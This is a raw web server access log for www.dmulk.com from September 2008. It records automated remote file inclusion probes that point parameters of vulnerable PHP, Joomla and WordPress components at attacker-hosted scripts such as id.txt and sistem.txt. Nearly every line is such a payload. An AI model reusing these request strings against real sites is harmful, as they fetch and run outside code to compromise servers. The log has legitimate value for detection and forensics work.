195.39.5.203 - - [12/Sep/2008:10:09:44 -0700] "GET /logs/access.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:09:52 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:10:09:52 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:09:56 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:09:56 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:09:59 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:09:59 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:09:59 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:09:59 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
66.59.244.246 - - [12/Sep/2008:10:10:00 -0700] "GET /logs/access_080828.log HTTP/1.1" 200 3291320 "-" "bwtgsgrp p9slDslvpfvdjkep9pqdlfef" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:10:00 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:10:10:00 -0700] "GET /logs/access_080711.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:10:01 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:10:01 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:01 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:01 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:01 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:10:02 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:02 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET /logs///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET ///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET /logs/access_071202.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
208.69.231.178 - - [12/Sep/2008:10:10:04 -0700] "GET /logs/access_080218.log///modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/bogorbudak/bangsat/idv6.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:10:29 -0700] "GET /logs/lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:10:29 -0700] "GET /lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:10:34 -0700] "GET /logs/access_080326.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:11:01 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [12/Sep/2008:10:11:01 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:11:17 -0700] "GET /logs/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:11:17 -0700] "GET /errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:11:33 -0700] "GET /logs/access_080306.log/admin/classes/TplLoad.php?full_path_to_public_program=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:11:35 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:11:41 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [12/Sep/2008:10:11:41 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:10:11:46 -0700] "GET /logs/access_080504.log/admin/classes/TplLoad.php?full_path_to_public_program=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:10:11:55 -0700] "GET /logs/access_080321.log%20%20//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:11:55 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:11:56 -0700] "GET /SQuery/lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:12:01 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:12:19 -0700] "GET /logs/access_080216.log//?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:12:20 -0700] "GET //?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 200 89209 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:12:22 -0700] "GET /logs//?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 200 64721 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:12:24 -0700] "GET //?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 200 89089 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:12:24 -0700] "GET //?_zb_path=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 200 89089 "-" "libwww-perl/5.79" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:12:26 -0700] "GET /logs/access_080727.log//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:12:26 -0700] "GET /logs/access_080727.log//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:12:27 -0700] "GET //include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:12:27 -0700] "GET //include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:12:27 -0700] "GET /logs//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:10:12:27 -0700] "GET /logs//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.9.3.36 - - [12/Sep/2008:10:12:35 -0700] "GET /errors.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:12:49 -0700] "GET /logs/lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:12:49 -0700] "GET /lib/gore.php?libpath=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:10:12:54 -0700] "GET /logs/access_080807.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:13:04 -0700] "GET /logs/access_080829.log/index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:13:05 -0700] "GET /index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89429 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.61.170 - - [12/Sep/2008:10:13:05 -0700] "GET /logs/index.php?option=com_banners&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:13:14 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:13:15 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:13:22 -0700] "GET /logs/access_080329.log//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:13:23 -0700] "GET //index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 200 89369 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:13:25 -0700] "GET /logs//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:10:13:25 -0700] "GET /logs/access_070801.log HTTP/1.0" 200 22773 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.254.44.210 - - [12/Sep/2008:10:13:25 -0700] "GET /logs/access_080321.log//index.php?option=com_content&task=http://www.altosystem.co.kr/data/file/free/id.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:26 -0700] "GET /logs//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:26 -0700] "GET /logs//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:26 -0700] "GET //admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:26 -0700] "GET //admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:27 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:27 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:27 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:27 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:29 -0700] "GET /logs//admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:30 -0700] "GET //admin/classes/errors.php?error=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.166.178 - - [12/Sep/2008:10:13:30 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://geocities.com/xibitz/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:13:53 -0700] "GET /logs//?pg=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 200 64721 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
12.159.64.135 - - [12/Sep/2008:10:13:54 -0700] "GET //?pg=http://www.visionsnet.com/links/mylinks/test.txt?? HTTP/1.1" 200 89108 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:13:59 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.230.115.32 - - [12/Sep/2008:10:14:00 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:14:06 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:14:06 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
89.218.85.18 - - [12/Sep/2008:10:14:09 -0700] "GET /logs/access_080311.log//?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:14:13 -0700] "GET /logs/access_080525.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:10:14:14 -0700] "GET /logs/access_080703.log/index.php?go=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:10:14:14 -0700] "GET /logs/index.php?go=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:10:14:15 -0700] "GET /index.php?go=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 200 89061 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:10:14:18 -0700] "GET /logs/access_080807.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:14:33 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:10:14:34 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:14:40 -0700] "GET /logs/access_080522.log/error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:14:41 -0700] "GET /error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:10:14:42 -0700] "GET /logs/error.php?error=http://www.prosubi.com.au//images/.bash/id7by.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:15:37 -0700] "GET /logs/access_080803.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:10:15:42 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:10:15:45 -0700] "GET /logs/access_080727.log//include/lib.inc.php?site_path=http://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
